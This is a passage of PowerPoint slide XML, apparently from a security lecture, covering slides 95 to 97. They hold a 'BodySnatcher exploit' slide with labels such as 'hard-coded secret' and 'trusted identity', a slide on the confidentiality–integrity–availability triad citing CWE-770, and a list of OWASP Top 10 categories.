            <a:pPr marL="685800" marR="0" indent="-6858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000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" marR="0" indent="-6858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dirty="0"/>
              <a:t>Auditing</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275208746"/>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5C97D-843A-AC9F-4552-7CFC5A99B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6871A-72BE-23AF-119A-7F01D1FB6364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BodySnatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FA3D487-2593-2B75-DB55-483CE769EC21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3A17D9-AE0B-AA76-CC9F-2EF406DA313A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544270" y="2773796"/>
            <a:ext cx="11277600" cy="9934363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A39E981-E89F-0598-EE6A-DCAB6560D958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13004139" y="3497764"/>
            <a:ext cx="5480667" cy="913711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solid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t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>ard-coded secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D54938-D1DF-EA95-D5B3-1D4E484E19BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13748419" y="6728634"/>
            <a:ext cx="4557337" cy="913711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solid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t>trusted identity </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Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3566EE3D-86C5-17AD-1825-FCCE9C5A9D36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7549116" y="3019989"/>
            <a:ext cx="3466214" cy="913711"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent5"/>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Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEB8D041-CAAD-385F-EE80-150F07A5B526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8725786" y="6827266"/>
            <a:ext cx="3210028" cy="815079"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent5"/>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13330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E197-7ED6-0BA5-1C9E-2C2C086D2BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Triad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340A892A-4673-617F-F934-561301D198C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487479" y="3117785"/>
            <a:ext cx="11993526" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - valuable information should not be leaked by computation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - valuable information should not be damaged by computation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - System is responsive to requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11259FB1-1AE5-18DB-FADF-50504313BF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C3B348-CD48-C708-E86D-07F9803DE6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="16521153" y="3117785"/>
            <a:ext cx="3324226" cy="2276474"/>
            <a:chOff x="3644667" y="2043113"/>
            <a:chExt cx="1662113" cy="1138237"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 4" descr="bricks_zigzag_texture_6190218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F334B8-CDCF-A30F-7629-877D21D5EAF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3644667" y="2043113"/>
              <a:ext cx="1662113" cy="1138237"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:blipFill dpi="0" rotWithShape="0">
                    <a:blip r:embed="rId2"/>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000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Line 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E9F60EC-169E-DE16-8CDE-736A5BBFA57D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4455880" y="2185988"/>
              <a:ext cx="471487" cy="41910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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Line 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD497665-31F3-8465-E48C-028E855B0D68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4455880" y="2605088"/>
              <a:ext cx="641350" cy="223837"/>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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Line 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6C6B0A-FA26-28EA-E405-8D8C6751E835}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4259030" y="2605088"/>
              <a:ext cx="196850" cy="41910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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Line 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA964CBE-54E2-9493-C119-E522CE1DFCEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3644667" y="2185988"/>
              <a:ext cx="811213" cy="41910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a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5991B6-4314-E248-8ED1-3630807D1BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15963941" y="5859416"/>
            <a:ext cx="3965576" cy="3241674"/>
            <a:chOff x="6704013" y="1417638"/>
            <a:chExt cx="1982787" cy="1620837"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7590B1E-9B1C-56F9-FBF3-6CDCF18101E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7429501" y="1885950"/>
              <a:ext cx="811212" cy="57626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000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C670FBF-577F-8F90-A6D8-E94EBDBB1355}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="8131175" y="1417638"/>
              <a:ext cx="109537" cy="468312"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF1B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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Line 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2624D248-7120-D927-8E3E-730AF42CCDF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6704013" y="1773238"/>
              <a:ext cx="641350" cy="223837"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF1B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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB85495D-4BFD-DB05-1C70-85AA7CF3C594}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="7429501" y="2462213"/>
              <a:ext cx="319087" cy="576262"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF1B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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Line 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{708F6E8E-17BA-BDB5-129D-7B532AF2985E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="8240712" y="2462213"/>
              <a:ext cx="365125" cy="576262"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF1B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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388D8D46-6A9E-A853-1059-7A16580EB59E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="8240712" y="1997075"/>
              <a:ext cx="446088" cy="163513"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF1B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0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA683C6-2B2D-69AB-9FB7-23D965046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424" y="8746896"/>
            <a:ext cx="6952620" cy="34100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07ABE49-65F0-F9FA-6A57-D552CA6573C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14624980" y="9704340"/>
            <a:ext cx="6249798" cy="2452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Light"/>
              </a:rPr>
              <a:t>CWE-770: Allocation of Resources Without Limits or Throttling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35366340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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="133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87E1-67D0-92F5-B6B1-E8B03BA3B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FEED5-5D37-BE8A-8DC1-A0906AE090D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9FCDE35-B9E0-7C2F-804E-8E8B575D665C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1160160" y="3134320"/>
            <a:ext cx="11270167" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Supply Chain Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptographic Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software or Data Integrity Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Logging and Alerting Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mishandling of Exceptional Conditions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB6C067E-FE80-036B-1054-CC2242DDCC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B677959C-88D7-4DDD-D925-F2A407E0C8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
